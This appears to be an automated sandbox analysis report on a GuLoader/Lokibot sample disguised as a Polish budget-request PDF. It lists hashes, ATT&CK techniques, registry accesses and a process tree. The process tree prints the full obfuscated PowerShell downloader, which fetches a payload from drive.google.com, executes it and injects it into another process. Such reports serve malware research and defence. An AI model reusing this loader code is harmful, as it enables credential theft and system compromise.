guloader | 7d326abdb7b5f1ecee1ab0385b9d4a569a1d355b479107aef9221fd213cfd23c

General

Target

WNIOSEK BUDŻETOWY 09-18-2024·pdf.vbs
Size

32KB
MD5

efc01dc5a4acefe058450f0dee1c1e9d
SHA1

f6244111b8588a7105124c4f4c40f6caa2bffa28
SHA256

7d326abdb7b5f1ecee1ab0385b9d4a569a1d355b479107aef9221fd213cfd23c
SHA512

eab5f2a42206d42628ab77d566b7394e6dafbb785b5cfd3abc357c5eed4dfce501246246e67ffa0e4389c974ccf60dda598f64a3277925cca74fb0611505ea4d
SSDEEP

384:Z9vOg3F19w8sNthahA0ZvF+io9vUErJHyvRe1P93fvTnm:Zp3F1qt0qA/oZJce1VHTm

Score

10^/10

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2692	powershell.exe
7	2692	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
9	drive.google.com
4	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
3044	wabmig.exe
3044	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2592	powershell.exe
3044	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2592 set thread context of 3044	2592	powershell.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2592	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2692	powershell.exe
2592	powershell.exe
2592	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2592	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	3044	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2792 wrote to memory of 2692	2792	WScript.exe	30
PID 2792 wrote to memory of 2692	2792	WScript.exe	30
PID 2792 wrote to memory of 2692	2792	WScript.exe	30
PID 2692 wrote to memory of 2584	2692	powershell.exe	32
PID 2692 wrote to memory of 2584	2692	powershell.exe	32
PID 2692 wrote to memory of 2584	2692	powershell.exe	32
PID 2692 wrote to memory of 1184	2692	powershell.exe	34
PID 2692 wrote to memory of 1184	2692	powershell.exe	34
PID 2692 wrote to memory of 1184	2692	powershell.exe	34
PID 1184 wrote to memory of 2592	1184	cmd.exe	35
PID 1184 wrote to memory of 2592	1184	cmd.exe	35
PID 1184 wrote to memory of 2592	1184	cmd.exe	35
PID 1184 wrote to memory of 2592	1184	cmd.exe	35
PID 2592 wrote to memory of 1684	2592	powershell.exe	36
PID 2592 wrote to memory of 1684	2592	powershell.exe	36
PID 2592 wrote to memory of 1684	2592	powershell.exe	36
PID 2592 wrote to memory of 1684	2592	powershell.exe	36
PID 2592 wrote to memory of 3044	2592	powershell.exe	37
PID 2592 wrote to memory of 3044	2592	powershell.exe	37
PID 2592 wrote to memory of 3044	2592	powershell.exe	37
PID 2592 wrote to memory of 3044	2592	powershell.exe	37
PID 2592 wrote to memory of 3044	2592	powershell.exe	37
PID 2592 wrote to memory of 3044	2592	powershell.exe	37

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WNIOSEK BUDŻETOWY 09-18-2024·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Juttying Bankbetjentene Backwardly Gulvmaattes Kameluldsfrakke Kamerafoeringen Dieselpriser #>;$Polemisering='Departementsvalgraadets';<#Potencies Manipuleringers Surtouts Inexist Brddevgges Krogstrup Barometer #>;$Beterschap30=$host.PrivateData;If ($Beterschap30) {$Statsamters++;}function Skovsanger($polyribosome){$Kontinentalsoklernes=$polyribosome.Length-$Statsamters;for( $Tastearbejderne=5;$Tastearbejderne -lt $Kontinentalsoklernes;$Tastearbejderne+=6){$Afsluttede+=$polyribosome[$Tastearbejderne];}$Afsluttede;}function Wined($Sebastine){ . ($Skyggetilvrelsernes253) ($Sebastine);}$Truculentness=Skovsanger 'BobblMKonfeoRul izHobnoiP edelC agolSva.ea r.ch/Bidra5Damok. M st0Figbi Re en(ThousWM ddeiJog inRorsmdTaroko C ttwSkimlsParad Medd.N AareT,icro Tilba1Scree0Archp.Ove p0G,tea;slage SpaltWBetoniBi onnAlbru6 Rso 4S,cia;Progr velgrxKar o6Ansg.4 Ange;ating Kamerr DetevMulta:archw1Ami,p2Blott1Liqua.Insci0Co.po)Tipie Adre GP,edeePa.atcSk ldk Dicho T,rm/Manin2Huber0 Lab,1fasth0 Skab0Opgav1Occur0Def n1Drogu LuisaFSenniiSwashrSidese edalfDrnhaoSti uxAlpel/ Volu1ocurr2 High1Prete.Banan0 G.ip ';$Arbejderfamilie=Skovsanger 'RegenUsget SOverbE He iR Grim-Ers aaSawargMisleeLi.atN Erstt,esic ';$Trekantdramaers12=Skovsanger 'a lejhNonretskrivtBedrvpOrthos Al a: C eq/Menox/ SnyddFdrelr ChnuiPsychv Sp ieForsi.AscengLinieoTelefochassg RefelCloakeBisi..TimotcPatt,oGammem dyk /C raluelud,cBeto ?.evefeKlo kxLreplpacromoOver.r G,mmtProse=Vovend.nfreoFor.bwVittun Pro lUnderoUn ecaRakufdConsi&softfi DispdDuroq=Reali1HeediIDisp LCon euNeurap O tlkTeathJ Res.xOverwZ Sor QRatioIDocumm.onspTKarriN GranY Mirr3 mblQBrian9 Aerox Kvad7Scuffe GlarOHegelS elteMNonpa4ResallInducn eace_EndowiDisart D,rs7 SlenWC,ackK,nmot ';$kalkerpapirer=Skovsanger 'Fumin> ann ';$Skyggetilvrelsernes253=Skovsanger 'UntasIyammeEPeri.XM rab ';$Klostret='Braid';$Detroniseringers235 = Skovsanger ' Gor e Gaa.cInterhUnscroal.am Rhaet%IridoaSt rapEcophp altodSaxataSid utLuftfaUnbel%Tilli\InterA Fst lscintvN tvriThamulS ivedFrpere TortsMisbe. H,rsSAlethcA.alyy Carb Ench&Reper& Ve.t FoyseeSangscCo,kbh rgaoFiltn oph.ttOsmol ';Wined (Skovsanger 'Chris$DeforgProvolCurb oAfdknbForbiaStorklshott:Neut Tskatti ncomNoncoeBu.nilK unsoSmaapf tormtprogreUnderrForwanEradieGy.it=Ha pu(ForwacSacham VitedTriko hudso/Sma,pc Proj Knott$Tipt DRubypeGrac tSvederDr ngoHumlenbutikiUn apsCivileConserUmageiKvivan OprrgSpejleUngenr k nssHersa2Accts3Brach5Heina)Skatt ');Wined (Skovsanger 'Kvlde$Rrelsg BewrlBahamoH ggeb Dt,iaSaliglUdmug: UnpeC PhonaceriutBestye ystl.rres=Trass$CompaTSolosrT,rtueslagvk RipeaCountnhypomtTandpdfljt rarranafieldmQuatea SurfeBenzir Raavsfibul1 Gr c2Hustu.O tstsSan tpDeadnlCafetiTalmutGroce(Rh bd$MxdwokClangaSpolelGestikBankbeUforsrAtomtpY.ntnaUmiddpPedoliUnprorFirkeePeachrQuote)ingen ');Wined (Skovsanger 'Epilh[ ArisN.patteFlannt wal.unsinSMacadezealor YorkvbodsviCallic angre k lkPSlakioPlatiiTrivinSvejst SubdMEp,rta etspnI looaP.ttyg C.taeProter Awkw]Fr va: Dist:VestvS ryppeOverncRenseu uperrFeteri FalsttekstypluraPUsmidrAntenoFemogtDefanoSlutncstanco AgnalTakke Enevl=Popul Sca e[breezN Resee Dra t,ngag.Mini S Sal e,ranicUniv u nderr strainavnktA smey P,agPFost rG uldoLit,itS ileoG sfocAtheroegnsplWilliTOmklayNuancpPrekneisrae]Eng.n:S,riv:SlackTRoys,lepidesInme,1 Re.b2Galva ');$Trekantdramaers12=$Catel[0];$Tsutsutsi= (Skovsanger 'Staa $Ce trGscabel.udesO Im.ebIsabea TilslKanal: elloROnk,eo,elegn TrouK odmaeVirksdThingO ountrIm,taS Stud=Su.erNFjer E IsocwSkrve-S rghoYo hubSus ejIsoceE voucCAudietNon l UndersHookuyMaskes TempTFjel,E lesmCavet. magN FejlECask T vejr. FurbwHelinePot ubSubagc Al.ulc ntrI Af eEAmat,NOverdt');$Tsutsutsi+=$Timelofterne[1];Wined ($Tsutsutsi);Wined (Skovsanger 'Binom$ UdserInfero ChinnScrubkRa doeToye dKroneo BundrHoydasFinge.Theo HP osteshortaCir ud raa eS allrst,rrsClea [Feltp$dis,oAF ilurDeltrb K tieBambujEposedEyebae forlr GofffHeropa V tfm reyiLyskolOverdiThoreeDi.tr]Krvel=Pro.e$ nvoiTInexcr ,irkuSomatcFaileuSkattlThiodeGlyconFortytMeta n .ncee NedfsSper,s Er v ');$adumbrating=Skovsanger ' Farm$ heemrStakaoAutoknRntgek ilkeePu hidSjusso L ngr Bo gs chro. SheiDSkopuoIrregw Almin Antil Funko TempaStjerd AlloFCleuciSwashlProdueAnbra(Antel$ RubbTUmorsrBenzoeF xnuk issa BalinHighpt IntedF rvar AffiaUndepmH,rmia FataeIsolarNeurasretun1Spejl2Pyrrh,I,sti$ versCMisy aEdentsUkuletunimaiLaetslRentriHinduaCadisn TapesSverikDecer)Andag ';$Castiliansk=$Timelofterne[0];Wined (Skovsanger 'Nedsk$ KoblG W,nrlColonOFixedB BureaevolulEvolv:Desinn atirOSpindNP ykoOFe ryc SvinCPro auS.btlP PeteAPreconOvergcPlagieT.ves= Fl l( UnprTGumpee Br gS QuarTBeeme-CoproP FlecaGazint darwHUnslu S.st$R.tuaCOve sAEldonsFetatT PariIHjrneLs.julikortba AfslN Tamps LejlkHydra)Jaukn ');while (!$Nonoccupance) {Wined (Skovsanger 'Bloc,$Zin kgPag tlO,erfoPastibOstraasommalGol e: Bl nPFusere La.rrA,ertiOp oskBeachuParkamS mbaeLuxurnResatsTeate=Galjo$TrkkotKolacrSko suUdseeeIndfa ') ;Wined $adumbrating;Wined (Skovsanger 'PolleS KonttFerieaPapporG avht Appe-FuskeS DianlblackeLiv feUnimppklker Komm4 cale ');Wined (Skovsanger 'Udski$Keenag AnellLanghoMorribVandfaTeatrl C pi:Re,igNSylt oAmninn TidsoMyxovc agecBlathuAppospStoffaHardwn StaacKil weSk.le=Naadi(AgeusTFeldieMegadsIndhot Klde-BssekPh rrea,ekantO eishEnh d .olke$HoffmC Pr sa Atoms LysttMcneiiInstrlLsrivioclocaForstnstrdesAbstikIncon)Ek ek ') ;Wined (Skovsanger 'Pr nt$Vaco,gLeucolGrueloBortlb ypopaCordolSteph:UndefNApophoUnsh nTangeoFolkebPolycsmaaneeManomrHutiavDo,siaOverlnBar.ecGenaneGgesksRatsb=Reco.$.ryllgKedellVerdeoDialibProtoaKindtl anm:FortiPriferr UvejeLaartd Fol.iTilkasUnpercSukkerResteiSo,tim Rat iSaaninSynera UafstD bbee.rimmdBlind7Handm7Inte +Fa ou+Minis% Flyv$ no.tCKludgaDefrot Brite Clegl Kore.Hyp.pc esuoAftllu Svign StattAp co ') ;$Trekantdramaers12=$Catel[$Nonobservances];}$Abdaria=298727;$Detinet=29520;Wined (Skovsanger 'Styrt$UncifgRevollb.lleoBhadobR deraUdvallFarms: ondiHantecvOvermi Fortd ,nivbNedrigPostke For r Ordb Salm=jules Ch orG CymbeAshietUntil-BelugC BundoAmph.nPaatet,iscoe SammnFortats ott Sculp$ onprCPopolaPrkensLuft tstolpi For.l TraniRigd aUnd rnEternsPh lokSiden ');Wined (Skovsanger 'F erc$AcrosgMak olrensko.ortebE straShapalInlym:ForhaUNicomn Chylcre leoK edidHenredBillelDispee Ht edMil s Ta ke=Ewryb arth[Povl.SWe ghyRerousHal,ttAmphieReglemVit l. CompCSkem o tr rn edrv Fe deDrainrForgltKamuf] Biot:Cursu: SyneF SkatrSn.seo D.anm ha.eBU.creaZestis QuipeCabal6Mycos4 FonoSIc.notPhonorKalveibillin C.opgDe os(aceto$Dyea H SkrmvConnii VetedOpholb AdelgF rvaeMagnerSpag.)Pren. ');Wined (Skovsanger 'Randi$ ofteg RedelEmagroSquibb Gldsa delslbozal:Hvl eCRappeiBestyr adj c IndsuBrn pmItch,sKir bc WillrBomb i.ovtwvSkafte Houh Forre=Poisu Cirke[pola S b,gsysvej sRa grt Evape Afk mWoode.panhaT kineFors x.ookit Dump.GlemmEbebudnReclic ZeosoRustldMediciAlkenn skatgBerap] Nona:Debla:,emerABrac,S BestC opcaIBacksIBetwe.UlushGBaetyeKatabtUnscaS OmsttTraphr mphijoinin .empgSk ks(epiku$ForeoUH,mozn rrkncBestrooystcd Hr,pd ,ibilRepubeG ocedArmbr) Pla, ');Wined (Skovsanger ',iutl$InstrgGi.oelD.sgro,arfubGingiaNysnvl rchm:Dep sA.hytodPinbauJulemmHaemobCali,rNonfeaOffentHaglbi Datao Kis n Koalstoot =Lynak$SpiraCOverciAmmedrProgrcUnsaluRo.tem UnresV,rdecC rberD rehi.wangv.ibrseBilbo.CompusUn.oquKen,abTalsts BeratSwandrTotaliEjdamnAdskigHjemk(Regob$IrideACa onbPr grdOlympa vlstrWadmaiMounda Soll, uckh$Zig,aD Renle Herrt R.beiSturdnsbeboePunilt urus)Subto ');Wined $Adumbrations;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Alvildes.Scy && echo t"
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Juttying Bankbetjentene Backwardly Gulvmaattes Kameluldsfrakke Kamerafoeringen Dieselpriser #>;$Polemisering='Departementsvalgraadets';<#Potencies Manipuleringers Surtouts Inexist Brddevgges Krogstrup Barometer #>;$Beterschap30=$host.PrivateData;If ($Beterschap30) {$Statsamters++;}function Skovsanger($polyribosome){$Kontinentalsoklernes=$polyribosome.Length-$Statsamters;for( $Tastearbejderne=5;$Tastearbejderne -lt $Kontinentalsoklernes;$Tastearbejderne+=6){$Afsluttede+=$polyribosome[$Tastearbejderne];}$Afsluttede;}function Wined($Sebastine){ . ($Skyggetilvrelsernes253) ($Sebastine);}$Truculentness=Skovsanger 'BobblMKonfeoRul izHobnoiP edelC agolSva.ea r.ch/Bidra5Damok. M st0Figbi Re en(ThousWM ddeiJog inRorsmdTaroko C ttwSkimlsParad Medd.N AareT,icro Tilba1Scree0Archp.Ove p0G,tea;slage SpaltWBetoniBi onnAlbru6 Rso 4S,cia;Progr velgrxKar o6Ansg.4 Ange;ating Kamerr DetevMulta:archw1Ami,p2Blott1Liqua.Insci0Co.po)Tipie Adre GP,edeePa.atcSk ldk Dicho T,rm/Manin2Huber0 Lab,1fasth0 Skab0Opgav1Occur0Def n1Drogu LuisaFSenniiSwashrSidese edalfDrnhaoSti uxAlpel/ Volu1ocurr2 High1Prete.Banan0 G.ip ';$Arbejderfamilie=Skovsanger 'RegenUsget SOverbE He iR Grim-Ers aaSawargMisleeLi.atN Erstt,esic ';$Trekantdramaers12=Skovsanger 'a lejhNonretskrivtBedrvpOrthos Al a: C eq/Menox/ SnyddFdrelr ChnuiPsychv Sp ieForsi.AscengLinieoTelefochassg RefelCloakeBisi..TimotcPatt,oGammem dyk /C raluelud,cBeto ?.evefeKlo kxLreplpacromoOver.r G,mmtProse=Vovend.nfreoFor.bwVittun Pro lUnderoUn ecaRakufdConsi&softfi DispdDuroq=Reali1HeediIDisp LCon euNeurap O tlkTeathJ Res.xOverwZ Sor QRatioIDocumm.onspTKarriN GranY Mirr3 mblQBrian9 Aerox Kvad7Scuffe GlarOHegelS elteMNonpa4ResallInducn eace_EndowiDisart D,rs7 SlenWC,ackK,nmot ';$kalkerpapirer=Skovsanger 'Fumin> ann ';$Skyggetilvrelsernes253=Skovsanger 'UntasIyammeEPeri.XM rab ';$Klostret='Braid';$Detroniseringers235 = Skovsanger ' Gor e Gaa.cInterhUnscroal.am Rhaet%IridoaSt rapEcophp altodSaxataSid utLuftfaUnbel%Tilli\InterA Fst lscintvN tvriThamulS ivedFrpere TortsMisbe. H,rsSAlethcA.alyy Carb Ench&Reper& Ve.t FoyseeSangscCo,kbh rgaoFiltn oph.ttOsmol ';Wined (Skovsanger 'Chris$DeforgProvolCurb oAfdknbForbiaStorklshott:Neut Tskatti ncomNoncoeBu.nilK unsoSmaapf tormtprogreUnderrForwanEradieGy.it=Ha pu(ForwacSacham VitedTriko hudso/Sma,pc Proj Knott$Tipt DRubypeGrac tSvederDr ngoHumlenbutikiUn apsCivileConserUmageiKvivan OprrgSpejleUngenr k nssHersa2Accts3Brach5Heina)Skatt ');Wined (Skovsanger 'Kvlde$Rrelsg BewrlBahamoH ggeb Dt,iaSaliglUdmug: UnpeC PhonaceriutBestye ystl.rres=Trass$CompaTSolosrT,rtueslagvk RipeaCountnhypomtTandpdfljt rarranafieldmQuatea SurfeBenzir Raavsfibul1 Gr c2Hustu.O tstsSan tpDeadnlCafetiTalmutGroce(Rh bd$MxdwokClangaSpolelGestikBankbeUforsrAtomtpY.ntnaUmiddpPedoliUnprorFirkeePeachrQuote)ingen ');Wined (Skovsanger 'Epilh[ ArisN.patteFlannt wal.unsinSMacadezealor YorkvbodsviCallic angre k lkPSlakioPlatiiTrivinSvejst SubdMEp,rta etspnI looaP.ttyg C.taeProter Awkw]Fr va: Dist:VestvS ryppeOverncRenseu uperrFeteri FalsttekstypluraPUsmidrAntenoFemogtDefanoSlutncstanco AgnalTakke Enevl=Popul Sca e[breezN Resee Dra t,ngag.Mini S Sal e,ranicUniv u nderr strainavnktA smey P,agPFost rG uldoLit,itS ileoG sfocAtheroegnsplWilliTOmklayNuancpPrekneisrae]Eng.n:S,riv:SlackTRoys,lepidesInme,1 Re.b2Galva ');$Trekantdramaers12=$Catel[0];$Tsutsutsi= (Skovsanger 'Staa $Ce trGscabel.udesO Im.ebIsabea TilslKanal: elloROnk,eo,elegn TrouK odmaeVirksdThingO ountrIm,taS Stud=Su.erNFjer E IsocwSkrve-S rghoYo hubSus ejIsoceE voucCAudietNon l UndersHookuyMaskes TempTFjel,E lesmCavet. magN FejlECask T vejr. FurbwHelinePot ubSubagc Al.ulc ntrI Af eEAmat,NOverdt');$Tsutsutsi+=$Timelofterne[1];Wined ($Tsutsutsi);Wined (Skovsanger 'Binom$ UdserInfero ChinnScrubkRa doeToye dKroneo BundrHoydasFinge.Theo HP osteshortaCir ud raa eS allrst,rrsClea [Feltp$dis,oAF ilurDeltrb K tieBambujEposedEyebae forlr GofffHeropa V tfm reyiLyskolOverdiThoreeDi.tr]Krvel=Pro.e$ nvoiTInexcr ,irkuSomatcFaileuSkattlThiodeGlyconFortytMeta n .ncee NedfsSper,s Er v ');$adumbrating=Skovsanger ' Farm$ heemrStakaoAutoknRntgek ilkeePu hidSjusso L ngr Bo gs chro. SheiDSkopuoIrregw Almin Antil Funko TempaStjerd AlloFCleuciSwashlProdueAnbra(Antel$ RubbTUmorsrBenzoeF xnuk issa BalinHighpt IntedF rvar AffiaUndepmH,rmia FataeIsolarNeurasretun1Spejl2Pyrrh,I,sti$ versCMisy aEdentsUkuletunimaiLaetslRentriHinduaCadisn TapesSverikDecer)Andag ';$Castiliansk=$Timelofterne[0];Wined (Skovsanger 'Nedsk$ KoblG W,nrlColonOFixedB BureaevolulEvolv:Desinn atirOSpindNP ykoOFe ryc SvinCPro auS.btlP PeteAPreconOvergcPlagieT.ves= Fl l( UnprTGumpee Br gS QuarTBeeme-CoproP FlecaGazint darwHUnslu S.st$R.tuaCOve sAEldonsFetatT PariIHjrneLs.julikortba AfslN Tamps LejlkHydra)Jaukn ');while (!$Nonoccupance) {Wined (Skovsanger 'Bloc,$Zin kgPag tlO,erfoPastibOstraasommalGol e: Bl nPFusere La.rrA,ertiOp oskBeachuParkamS mbaeLuxurnResatsTeate=Galjo$TrkkotKolacrSko suUdseeeIndfa ') ;Wined $adumbrating;Wined (Skovsanger 'PolleS KonttFerieaPapporG avht Appe-FuskeS DianlblackeLiv feUnimppklker Komm4 cale ');Wined (Skovsanger 'Udski$Keenag AnellLanghoMorribVandfaTeatrl C pi:Re,igNSylt oAmninn TidsoMyxovc agecBlathuAppospStoffaHardwn StaacKil weSk.le=Naadi(AgeusTFeldieMegadsIndhot Klde-BssekPh rrea,ekantO eishEnh d .olke$HoffmC Pr sa Atoms LysttMcneiiInstrlLsrivioclocaForstnstrdesAbstikIncon)Ek ek ') ;Wined (Skovsanger 'Pr nt$Vaco,gLeucolGrueloBortlb ypopaCordolSteph:UndefNApophoUnsh nTangeoFolkebPolycsmaaneeManomrHutiavDo,siaOverlnBar.ecGenaneGgesksRatsb=Reco.$.ryllgKedellVerdeoDialibProtoaKindtl anm:FortiPriferr UvejeLaartd Fol.iTilkasUnpercSukkerResteiSo,tim Rat iSaaninSynera UafstD bbee.rimmdBlind7Handm7Inte +Fa ou+Minis% Flyv$ no.tCKludgaDefrot Brite Clegl Kore.Hyp.pc esuoAftllu Svign StattAp co ') ;$Trekantdramaers12=$Catel[$Nonobservances];}$Abdaria=298727;$Detinet=29520;Wined (Skovsanger 'Styrt$UncifgRevollb.lleoBhadobR deraUdvallFarms: ondiHantecvOvermi Fortd ,nivbNedrigPostke For r Ordb Salm=jules Ch orG CymbeAshietUntil-BelugC BundoAmph.nPaatet,iscoe SammnFortats ott Sculp$ onprCPopolaPrkensLuft tstolpi For.l TraniRigd aUnd rnEternsPh lokSiden ');Wined (Skovsanger 'F erc$AcrosgMak olrensko.ortebE straShapalInlym:ForhaUNicomn Chylcre leoK edidHenredBillelDispee Ht edMil s Ta ke=Ewryb arth[Povl.SWe ghyRerousHal,ttAmphieReglemVit l. CompCSkem o tr rn edrv Fe deDrainrForgltKamuf] Biot:Cursu: SyneF SkatrSn.seo D.anm ha.eBU.creaZestis QuipeCabal6Mycos4 FonoSIc.notPhonorKalveibillin C.opgDe os(aceto$Dyea H SkrmvConnii VetedOpholb AdelgF rvaeMagnerSpag.)Pren. ');Wined (Skovsanger 'Randi$ ofteg RedelEmagroSquibb Gldsa delslbozal:Hvl eCRappeiBestyr adj c IndsuBrn pmItch,sKir bc WillrBomb i.ovtwvSkafte Houh Forre=Poisu Cirke[pola S b,gsysvej sRa grt Evape Afk mWoode.panhaT kineFors x.ookit Dump.GlemmEbebudnReclic ZeosoRustldMediciAlkenn skatgBerap] Nona:Debla:,emerABrac,S BestC opcaIBacksIBetwe.UlushGBaetyeKatabtUnscaS OmsttTraphr mphijoinin .empgSk ks(epiku$ForeoUH,mozn rrkncBestrooystcd Hr,pd ,ibilRepubeG ocedArmbr) Pla, ');Wined (Skovsanger ',iutl$InstrgGi.oelD.sgro,arfubGingiaNysnvl rchm:Dep sA.hytodPinbauJulemmHaemobCali,rNonfeaOffentHaglbi Datao Kis n Koalstoot =Lynak$SpiraCOverciAmmedrProgrcUnsaluRo.tem UnresV,rdecC rberD rehi.wangv.ibrseBilbo.CompusUn.oquKen,abTalsts BeratSwandrTotaliEjdamnAdskigHjemk(Regob$IrideACa onbPr grdOlympa vlstrWadmaiMounda Soll, uckh$Zig,aD Renle Herrt R.beiSturdnsbeboePunilt urus)Subto ');Wined $Adumbrations;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1184
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Juttying Bankbetjentene Backwardly Gulvmaattes Kameluldsfrakke Kamerafoeringen Dieselpriser #>;$Polemisering='Departementsvalgraadets';<#Potencies Manipuleringers Surtouts Inexist Brddevgges Krogstrup Barometer #>;$Beterschap30=$host.PrivateData;If ($Beterschap30) {$Statsamters++;}function Skovsanger($polyribosome){$Kontinentalsoklernes=$polyribosome.Length-$Statsamters;for( $Tastearbejderne=5;$Tastearbejderne -lt $Kontinentalsoklernes;$Tastearbejderne+=6){$Afsluttede+=$polyribosome[$Tastearbejderne];}$Afsluttede;}function Wined($Sebastine){ . ($Skyggetilvrelsernes253) ($Sebastine);}$Truculentness=Skovsanger 'BobblMKonfeoRul izHobnoiP edelC agolSva.ea r.ch/Bidra5Damok. M st0Figbi Re en(ThousWM ddeiJog inRorsmdTaroko C ttwSkimlsParad Medd.N AareT,icro Tilba1Scree0Archp.Ove p0G,tea;slage SpaltWBetoniBi onnAlbru6 Rso 4S,cia;Progr velgrxKar o6Ansg.4 Ange;ating Kamerr DetevMulta:archw1Ami,p2Blott1Liqua.Insci0Co.po)Tipie Adre GP,edeePa.atcSk ldk Dicho T,rm/Manin2Huber0 Lab,1fasth0 Skab0Opgav1Occur0Def n1Drogu LuisaFSenniiSwashrSidese edalfDrnhaoSti uxAlpel/ Volu1ocurr2 High1Prete.Banan0 G.ip ';$Arbejderfamilie=Skovsanger 'RegenUsget SOverbE He iR Grim-Ers aaSawargMisleeLi.atN Erstt,esic ';$Trekantdramaers12=Skovsanger 'a lejhNonretskrivtBedrvpOrthos Al a: C eq/Menox/ SnyddFdrelr ChnuiPsychv Sp ieForsi.AscengLinieoTelefochassg RefelCloakeBisi..TimotcPatt,oGammem dyk /C raluelud,cBeto ?.evefeKlo kxLreplpacromoOver.r G,mmtProse=Vovend.nfreoFor.bwVittun Pro lUnderoUn ecaRakufdConsi&softfi DispdDuroq=Reali1HeediIDisp LCon euNeurap O tlkTeathJ Res.xOverwZ Sor QRatioIDocumm.onspTKarriN GranY Mirr3 mblQBrian9 Aerox Kvad7Scuffe GlarOHegelS elteMNonpa4ResallInducn eace_EndowiDisart D,rs7 SlenWC,ackK,nmot ';$kalkerpapirer=Skovsanger 'Fumin> ann ';$Skyggetilvrelsernes253=Skovsanger 'UntasIyammeEPeri.XM rab ';$Klostret='Braid';$Detroniseringers235 = Skovsanger ' Gor e Gaa.cInterhUnscroal.am Rhaet%IridoaSt rapEcophp altodSaxataSid utLuftfaUnbel%Tilli\InterA Fst lscintvN tvriThamulS ivedFrpere TortsMisbe. H,rsSAlethcA.alyy Carb Ench&Reper& Ve.t FoyseeSangscCo,kbh rgaoFiltn oph.ttOsmol ';Wined (Skovsanger 'Chris$DeforgProvolCurb oAfdknbForbiaStorklshott:Neut Tskatti ncomNoncoeBu.nilK unsoSmaapf tormtprogreUnderrForwanEradieGy.it=Ha pu(ForwacSacham VitedTriko hudso/Sma,pc Proj Knott$Tipt DRubypeGrac tSvederDr ngoHumlenbutikiUn apsCivileConserUmageiKvivan OprrgSpejleUngenr k nssHersa2Accts3Brach5Heina)Skatt ');Wined (Skovsanger 'Kvlde$Rrelsg BewrlBahamoH ggeb Dt,iaSaliglUdmug: UnpeC PhonaceriutBestye ystl.rres=Trass$CompaTSolosrT,rtueslagvk RipeaCountnhypomtTandpdfljt rarranafieldmQuatea SurfeBenzir Raavsfibul1 Gr c2Hustu.O tstsSan tpDeadnlCafetiTalmutGroce(Rh bd$MxdwokClangaSpolelGestikBankbeUforsrAtomtpY.ntnaUmiddpPedoliUnprorFirkeePeachrQuote)ingen ');Wined (Skovsanger 'Epilh[ ArisN.patteFlannt wal.unsinSMacadezealor YorkvbodsviCallic angre k lkPSlakioPlatiiTrivinSvejst SubdMEp,rta etspnI looaP.ttyg C.taeProter Awkw]Fr va: Dist:VestvS ryppeOverncRenseu uperrFeteri FalsttekstypluraPUsmidrAntenoFemogtDefanoSlutncstanco AgnalTakke Enevl=Popul Sca e[breezN Resee Dra t,ngag.Mini S Sal e,ranicUniv u nderr strainavnktA smey P,agPFost rG 